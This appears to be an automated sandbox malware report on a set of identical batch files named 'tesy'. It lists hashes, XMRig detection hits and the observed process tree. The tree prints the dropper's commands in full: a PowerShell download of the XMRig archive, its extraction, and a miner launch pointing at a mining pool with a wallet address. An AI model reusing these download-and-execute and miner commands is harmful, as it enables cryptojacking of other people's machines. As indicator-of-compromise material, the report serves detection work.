Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-1703-x64
10tesy - Copy (11).bat
windows10-1703-x64
10tesy - Copy (12).bat
windows10-1703-x64
10tesy - Copy (13).bat
windows10-1703-x64
10tesy - Copy (14).bat
windows10-1703-x64
10tesy - Copy (2).bat
windows10-1703-x64
10tesy - Copy (3).bat
windows10-1703-x64
10tesy - Copy (4).bat
windows10-1703-x64
10tesy - Copy (5).bat
windows10-1703-x64
10tesy - Copy (6).bat
windows10-1703-x64
10tesy - Copy (7).bat
windows10-1703-x64
10tesy - Copy (8).bat
windows10-1703-x64
10tesy - Copy (9).bat
windows10-1703-x64
10tesy - Copy.bat
windows10-1703-x64
10tesy.bat
windows10-1703-x64
10Analysis
-
max time kernel
1794s -
max time network
1806s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
30-12-2023 07:23
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10-20231220-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10-20231220-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10-20231215-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10-20231215-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10-20231215-en
General
-
Target
tesy - Copy.bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral14/files/0x000600000001ac25-119.dat family_xmrig behavioral14/files/0x000600000001ac25-119.dat xmrig behavioral14/memory/5088-122-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-123-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-126-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-127-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-130-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-131-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-132-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-133-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-134-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-135-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-136-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-137-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-138-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-139-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-140-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-141-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-142-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-143-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-144-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-145-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-146-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-147-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-148-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-149-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-150-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-151-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-152-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-153-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-154-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-155-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-156-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-157-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-158-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-159-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-160-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-161-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-162-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-163-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-164-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-165-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-166-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-167-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-168-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-169-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-170-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-171-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-172-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-173-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-174-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-175-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-176-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-177-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-178-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-179-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-180-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-181-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-182-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-183-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-184-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-185-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-186-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig behavioral14/memory/5088-187-0x00007FF6EEEA0000-0x00007FF6EF9A3000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
flow pid Process 4 5044 powershell.exe 6 5044 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5088 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 1844 powershell.exe 1844 powershell.exe 1844 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 640 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 1844 powershell.exe Token: SeLockMemoryPrivilege 5088 xmrig.exe Token: SeLockMemoryPrivilege 5088 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5088 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 8 wrote to memory of 5044 8 cmd.exe 30 PID 8 wrote to memory of 5044 8 cmd.exe 30 PID 8 wrote to memory of 1844 8 cmd.exe 74 PID 8 wrote to memory of 1844 8 cmd.exe 74 PID 8 wrote to memory of 5088 8 cmd.exe 75 PID 8 wrote to memory of 5088 8 cmd.exe 75
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:8 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5088
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5ef32294976d9291d732045f2c7b75bd9
SHA18d3a27350a4e625f8456b5f1a02e73904165557e
SHA256759e256b19951b0035e2baa428715ff699e7ae35f7671b929ac02b24ca553219
SHA512fa31da6c840290f04634f2e558885a913c78672a4eebc5f8fb08c7269f79f1af586557ee68ede23f37a31a34e507ec7b4307d6cf53fadc7e80d95865063e1e03
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
30KB
MD5e0fd4e23e9c6101b3e26c14a9579b389
SHA1cb0da5f01413e3f6ec3ddb707a2cba3ff5a03e4e
SHA256a6e6773a1dcb9788d9838c2be3fda5fbd422d7931b73c2997598b61dc013aeac
SHA512bc8b1af3472ad5f99b440f61853300ca501341cfef5e6d6c0156331ae0c3be0e788d7663569c1edbd94e083e77c9cf3ca35d28ff339b00805ac6bc373cc618cf
-
Filesize
78KB
MD505687030d6c1ff777ef5f200c6cb3e9d
SHA13ab330585182bb084509873bb8594e7aae48124a
SHA256b404c3f533cf252f51749190bcf028ee93536a7edb49565debe478fd223907e9
SHA51227b8760dc3b2f109e92f8a675dfd28f5cd0d7463fea741e874040ccb30d588a5cbb46b075a6301187e3f714d714a01b3b637206b94bccc9874c15439c9828325